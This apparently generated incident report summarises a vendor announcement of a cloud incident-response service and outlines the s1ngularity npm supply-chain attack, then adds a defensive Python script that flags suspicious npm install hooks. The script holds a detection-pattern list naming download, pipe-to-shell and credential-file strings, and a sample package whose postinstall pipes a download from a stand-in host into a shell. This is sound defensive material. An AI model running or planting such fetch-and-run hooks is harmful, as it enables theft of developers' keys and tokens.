Full Report
Announcing the public preview of Wiz’s in-house Incident Response service—empowering customers to investigate, contain, and resolve cyber incidents with confidence
Analysis Summary
The provided text is an announcement for the public preview of the Wiz Incident Response service, focusing on its capabilities in responding to **cloud security incidents** and using the recent **s1ngularity supply chain attack** as a real-world example to demonstrate expertise. The document does not detail a *specific* past incident that Wiz responded to; rather, it profiles the *launch* of the service and its general methodology based on observed threats.
Therefore, the summary below is constructed based on the **Wiz service announcement and the case study example mentioned (s1ngularity)**, as that is the only concrete event described in detail.
# Incident Report: Wiz IR Service Launch & s1ngularity Threat Profile
## Executive Summary
Wiz announced the public preview of its dedicated Incident Response (IR) service, leveraging deep cloud security expertise to help organizations investigate, contain, and recover from cloud-native breaches quickly. The announcement profiled the threat landscape by referencing the August 2025 s1ngularity supply chain attack, where malicious versions of the Nx build system package were published to npm to steal developer assets via post-installation scripts.
## Incident Details
- **Discovery Date:** Not applicable (Announcement Date: September 17, 2025)
- **Incident Date (s1ngularity Reference):** August 26, 2025
- **Affected Organization:** Multiple organizations dependent on the compromised npm package were potentially affected.
- **Sector:** Technology/Software Development (Supply Chain Attack affecting build systems)
- **Geography:** Global (npm registry)
## Timeline of Events
### Initial Access (s1ngularity Reference)
- **Date/Time:** On or around August 26, 2025
- **Vector:** Software Supply Chain Attack (compromised public package registry)
- **Details:** Malicious versions of the Nx build system package were published to the npm registry.
### Lateral Movement (s1ngularity Reference)
- **Details:** Malware ran as a post-installation script, leveraging AI command-line tools for reconnaissance within the affected developer environment.
### Data Exfiltration/Impact (s1ngularity Reference)
- **Details:** Sensitive developer assets were harvested, including cryptocurrency wallets, GitHub and npm tokens, and SSH keys. Data was exfiltrated to a publicly accessible location.
### Detection & Response (Wiz IR Service Focus)
- **Detection:** Wiz Defend and Runtime Sensor capabilities are cited for alerting on such attacks.
- **Response Actions:** The new Wiz IR service offers scoping, forensic investigation, containment, remediation, and ongoing monitoring.
## Attack Methodology (Based on s1ngularity Reference)
- **Initial Access:** Supply Chain compromise (publishing malicious package to npm).
- **Persistence:** Post-installation script executed upon the target installing the compromised package.
- **Privilege Escalation:** Not explicitly detailed, but sensitive credentials were targeted.
- **Defense Evasion:** "Living off the cloud" (not deploying custom malware, but abusing tooling and functions already present in the environment).
- **Credential Access:** Harvesting tokens (GitHub, npm) and SSH keys.
- **Discovery:** Reconnaissance aided by AI command-line tools.
- **Lateral Movement:** Not detailed.
- **Collection:** Gathering developer assets (wallets, tokens, keys).
- **Exfiltration:** Data sent to a publicly accessible location.
- **Impact:** Theft of sensitive authentication materials and financial assets.
## Impact Assessment (s1ngularity Reference)
- **Financial:** Potential loss via cryptocurrency wallets.
- **Data Breach:** Developer authentication tokens (GitHub, npm) and SSH keys.
- **Operational:** Compromise of developer environments, potential for further systemic exploitation through stolen keys.
- **Reputational:** Damage to trust in the software supply chain.
## Indicators of Compromise
*Note: Since the article is an announcement, specific IoCs are not provided; these are generalized based on the attack type described.*
- **Network indicators:** Connections to publicly accessible IP addresses used for exfiltration.
- **File indicators:** Execution of post-installation script from the compromised npm package payload.
- **Behavioral indicators:** Use of AI command-line tools for environment inspection.
## Response Actions (Defined by Wiz IR Offering)
- **Containment measures:** Identifying all systems that executed the malicious package.
- **Eradication steps:** Revocation and rotation of all harvested tokens and keys.
- **Recovery actions:** Strengthening dependency scanning and artifact integrity checks.
## Lessons Learned
- Cloud environments require specialized response due to ephemeral infrastructure and complex IAM configurations.
- Attackers are leveraging software supply chain mechanisms (like npm) for initial access.
- Attackers prefer "living off the cloud" to avoid traditional malware signatures.
## Recommendations
- Implement strong cloud-native detection capabilities (like Wiz Defend/Runtime Sensor) to monitor runtime behavior.
- Thoroughly vet dependencies leveraged in development pipelines, specifically looking for anomalies in package installation scripts.
- Establish proven cloud-specific incident response plans covering ephemeral data preservation and complex IAM tracing.
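The second recommendation above (vetting dependencies for anomalies in their installation scripts) and the containment step of identifying which systems ran a package's install hook can both be supported by a small audit of the installed dependency tree. The following Python script is an added example written for this report; it is not Wiz's code and not part of the original announcement. It walks a `node_modules` tree, reports every package that declares an npm lifecycle hook (`preinstall`, `install`, `postinstall`), and flags hook commands matching a set of review heuristics. The heuristic patterns and the sample package tree are assumptions constructed here for illustration; a real deployment would tune them to the organization's own baseline.

```python
import json
import tempfile
from pathlib import Path
from typing import Dict, List

# npm runs these hooks automatically when a dependency is installed, which is
# the mechanism the s1ngularity reference above abused.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Assumed review heuristics (not from the page): substrings in a hook command
# that a reviewer would want to look at by hand before trusting the package.
REVIEW_PATTERNS = ("curl ", "wget ", "| sh", "| bash", ".ssh", ".npmrc",
                   "eval(", "base64", "child_process")


def audit_manifest(manifest: Dict) -> List[Dict]:
    """Return one finding per lifecycle hook declared in a package.json dict."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [p for p in REVIEW_PATTERNS if p in cmd]
        findings.append({
            "package": manifest.get("name", "<unnamed>"),
            "version": manifest.get("version", "<unknown>"),
            "hook": hook,
            "command": cmd,
            "review_hits": hits,
            # "review" means a human should read the script before the package
            # is trusted; "info" means a hook exists but matched no heuristic.
            "severity": "review" if hits else "info",
        })
    return findings


def audit_node_modules(root: Path) -> List[Dict]:
    """Walk a node_modules tree and audit every package.json found in it."""
    findings: List[Dict] = []
    for manifest_path in sorted(root.rglob("package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash
        if not isinstance(manifest, dict):
            continue
        findings.extend(audit_manifest(manifest))
    return findings


def build_sample_tree(base: Path) -> Path:
    """Write a constructed node_modules tree for the demo (sample data only)."""
    pkgs = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
        "native-addon-ish": {
            "name": "native-addon-ish", "version": "2.3.1",
            "scripts": {"install": "node-gyp rebuild"},
        },
        "suspicious-build-tool": {
            "name": "suspicious-build-tool", "version": "0.0.9",
            "scripts": {"postinstall": "curl https://example.invalid/setup | sh"},
        },
    }
    root = base / "node_modules"
    for name, manifest in pkgs.items():
        (root / name).mkdir(parents=True)
        (root / name / "package.json").write_text(json.dumps(manifest))
    return root


def main() -> None:
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(Path(tmp))
        for f in audit_node_modules(root):
            print(f"[{f['severity']}] {f['package']}@{f['version']} "
                  f"{f['hook']}: {f['command']}  hits={f['review_hits']}")


if __name__ == "__main__":
    main()
```

Run as-is, the script prints one `info` line for the package whose install hook only rebuilds a native addon and one `review` line for the constructed package whose postinstall pipes a download into a shell. Pointing `audit_node_modules` at a real project directory gives a quick inventory of which installed packages execute code at install time, which is the list a responder needs when scoping which hosts ran a given hook and which is the starting point for the manual vetting the recommendation calls for.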